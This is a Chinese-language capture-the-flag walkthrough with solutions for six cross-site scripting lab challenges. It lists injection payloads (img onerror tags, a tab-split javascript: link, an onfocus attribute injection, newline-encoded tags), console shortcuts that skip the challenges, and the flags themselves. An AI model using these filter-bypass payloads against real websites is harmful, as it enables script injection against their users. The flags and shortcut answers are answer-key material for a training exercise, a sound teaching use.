跨站脚本深入
任务环境说明:
服务器场景:Server2125(关闭链接)
服务器场景操作系统:未知
1. 访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;
解法一:http://靶机IP/1/?name=</h2><img src=1 onerror=alert(1)>
解法二:F12打开控制台,输入 alert(1) 回车
解法三:F12打开控制台,输入 b64_md5('simple') 回车
flag:jb3aSPuHSNZ0bxllgk6Wag
2. 访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交
解法一:http://靶机IP/2/index.php?keyword="</h2><img SRC=1 ONERROR=alert(1)>&submit=搜索
解法二:F12打开控制台,输入 alert() 回车
解法三:F12打开控制台,输入 b64_md5('relaxed') 回车
flag:gfMr4koqYvxHLMQ+3JfmWw
3. 访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;
解法一: 先把javascript:alert(1)转换成HTML编码
(1)输入进去,回车 (2)然后在点击友情链接
解法二: 在url中的keyword参数后输出javas%09cript:alert(1) 然后在点击友情链接
解法三:F12打开控制台,输入 alert() 回车
解法四:F12打开控制台,输入 b64_md5('challenge') 回车
flag:sE7ArePUm0oHnw4gfV4oIQ
4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;
解法一: 使用Win7的谷歌浏览器,发现了这些
" οnfοcus="alert(1)" type=text " 提交Cookie后点击一下input框,就会弹出来 其他触发事件也可以,不值可以用onfocus
解法二:F12打开控制台,输入 alert() 回车
解法三:F12打开控制台,输入 b64_md5('commonly') 回车
flag:nQO7ofm1/wzUgGBnrR55qg
5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;
我怀疑这题有问题,这题应该对应XSS-Labs第15关 解法一:F12打开控制台,输入 alert(1) 回车
解法二:F12打开控制台,输入 b64_md5('Uncomfortable') 回车
g:QmRhA990viE8yP/PWbnKhw
6. 访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交;
解法一:http://靶机IP/6/?keyword=%3Cimg%0Asrc=1%0Dοnerrοr=alert()%3E
解法二:F12打开控制台,输入 alert() 回车
flag:LHOm3XR7ig6+hgo2Zd/Y6g
